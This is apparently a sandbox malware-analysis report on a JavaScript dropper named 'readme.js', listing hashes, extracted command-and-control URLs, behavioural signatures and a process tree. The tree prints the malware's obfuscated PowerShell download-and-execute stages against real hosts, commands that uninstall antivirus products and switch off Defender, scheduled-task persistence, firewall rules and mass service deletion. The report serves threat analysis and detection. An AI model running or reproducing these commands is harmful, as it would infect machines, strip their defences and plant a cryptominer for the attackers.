Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-02-2021 18:36
General
-
Target
readme.js
-
Size
9KB
-
MD5
e294d6f427c64f77b5b61bb7b17dd12c
-
SHA1
ccdae3ada854cc441106ec52c12823439bab6cba
-
SHA256
9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
-
SHA512
2c974b0969e4d9b3d1ded364c0a6033e827f0a4890730b9b062c76b690425f8fefc90aa8c9e6dfc599a7909e18a949c6a4b2d4b5dd5787a3bbac0834e70fe82a
Malware Config
Extracted
http://t.zz3r0.com
Extracted
http://t.zer9g.com
Extracted
http://t.bb3u9.com
Extracted
http://t.bb3u9.com
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 5 IoCs
-
Blocklisted process makes network request 8 IoCs
-
Executes dropped EXE 4 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 11 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
-
Modifies data under HKEY_USERS 52 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad C:\Users\Admin\AppData\Local\Temp\readme.js3⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*EIDQHRRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 14⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Eset%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avast%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%avp%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \5E73AscDe2d /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \5E73AscDe2d4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn tw6XxSsGFpu\TBOf76Y /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn tw6XxSsGFpu\TBOf76Y4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\rDpfKEdQXP\qCRJcTpUK /F /tr "powershell -w hidden -c PS_CMD"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\rDpfKEdQXP\qCRJcTpUK4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd4⤵
-
C:\Windows\system32\netsh.exenetsh.exe firewall add portopening tcp 65529 SDNSd5⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=534⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F4⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {6C3F046A-A24A-450C-8E89-71042E45AF3C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|biJkcCEA.exe -3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='727753b00afea107203a693b45e9fd24';$ifp=$env:tmp+'\if.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\f5hj1zbh\f5hj1zbh.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES279D.tmp" "c:\Windows\Temp\f5hj1zbh\CSCC9AA070B58D04584A89E871DCB5677EF.TMP"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\nmvk3spo\nmvk3spo.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES2F3B.tmp" "c:\Windows\Temp\nmvk3spo\CSC7FDDEC82A16F489D8239AB599BAC44.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\cfmypwl0\cfmypwl0.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESE531.tmp" "c:\Windows\Temp\cfmypwl0\CSCEBFE6450C2224554919A2F1BB96461F.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\ruaz535h\ruaz535h.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESB7DA.tmp" "c:\Windows\Temp\ruaz535h\CSC228D84EF599C4C40B0A4591652A9E121.TMP"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\frp2jgjf\frp2jgjf.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES35C0.tmp" "c:\Windows\Temp\frp2jgjf\CSCFB632C7FC5C4E23AEA7715F7D6C75D2.TMP"6⤵
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all5⤵
- Gathers network information
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns5⤵
- Gathers network information
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano5⤵
- Gathers network information
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|biJkcCEA.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe3⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2788 -s 18765⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c copy /y C:\Windows\TEMP\m6.bin.ori C:\Windows\TEMP\m6.bin.exe4⤵
-
C:\Windows\TEMP\m6.bin.exeC:\Windows\TEMP\m6.bin.exe4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|biJkcCEA.exe -3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&42:4A:BE:5A:77:6C');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\biJkcCEA.exebiJkcCEA.exe -4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\j3wn4yby\j3wn4yby.cmdline"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RESD72D.tmp" "c:\Windows\Temp\j3wn4yby\CSCAFD0837FE44847118E3FE9B1E05923A5.TMP"6⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete xWinWpdSrv5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete SVSHost5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config lsass Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete lsass5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Microsoft5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config system Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete system5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Oracleupdate5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config CLR Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete CLR5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete sysmgt5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config \gm Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete \gm5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WmdnPnSN5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Sougoudl5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config National Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete National5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaaal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Natimmonal5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationaloll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalmll5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalaie5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Nationalwpi5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp325⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete WinHelp645⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Stop Samserver5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" Delete Samserver5⤵
-
